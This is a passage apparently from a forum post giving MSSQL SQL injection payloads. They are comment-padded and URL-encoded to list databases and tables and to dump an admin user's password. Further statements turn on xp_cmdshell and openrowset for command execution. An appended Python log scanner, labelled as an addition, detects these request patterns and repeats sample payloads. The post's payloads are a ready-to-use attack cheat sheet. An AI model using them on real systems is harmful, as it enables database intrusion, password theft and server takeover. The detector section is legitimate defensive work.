CODE:
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--

Statement for dumping table names. The somedb part is the database to be listed, and the red number 1 is incremented.

CODE:
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--

Statement for dumping column values: dumps the password field for user='icerover' in table admin.

CODE:
/**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--

On MSSQL 2005, xp_cmdshell is not enabled by default, and openrowset cannot be used either.
With sa privileges, they can be enabled like this.
Enable openrowset

CODE:
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--

Enable xp_cmdshell

CODE:
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--

OK, over~~ good night

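A defender's view of the requests above, as an added example that is not part of the original post: a scanner for web access logs that URL-decodes a query string, collapses the /**/ comment padding, and flags the system-catalog reads and sp_configure changes shown in the post. The rule names and the sample query strings are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Rule name -> pattern, matched after normalisation (comments collapsed to one space).
RULES = {
    "system-catalog-read": re.compile(r"\b(sysdatabases|sys\.all_objects)\b", re.I),
    "sp_configure-change": re.compile(
        r"sp_configure\s+'(xp_cmdshell|ad hoc distributed queries|"
        r"show advanced options)'\s*,\s*1", re.I),
    "reconfigure": re.compile(r"\breconfigure\b", re.I),
    # Subquery compared with 0 and the rest of the statement commented out.
    "comparison-then-comment-tail": re.compile(r"\)\s*=\s*0\s*--"),
}
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)


def normalise(query_string):
    """URL-decode, then turn inline SQL comments and whitespace runs into one space."""
    decoded = unquote(query_string)          # %3d -> '=', %2b -> '+'
    no_comments = INLINE_COMMENT.sub(" ", decoded)
    return re.sub(r"\s+", " ", no_comments).strip()


def scan(query_string):
    """Return the sorted names of the rules this query string triggers."""
    text = normalise(query_string)
    hits = {name for name, rx in RULES.items() if rx.search(text)}
    # Several inline comments standing in for spaces is a signal on its own.
    if len(INLINE_COMMENT.findall(unquote(query_string))) >= 3:
        hits.add("comment-as-whitespace")
    return sorted(hits)


# Constructed query strings, not real traffic.
SAMPLES = [
    "id=7&page=2",
    "id=7/**/and/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects)%3d0--",
    "id=7;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--",
    "q=see /* note */ in docs",              # a lone comment is not flagged
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(scan(sample) or "clean", "<-", sample)
```

Matching on the normalised text is the point: a signature written for "sp_configure 'xp_cmdshell'" with literal spaces never fires on the comment-padded form.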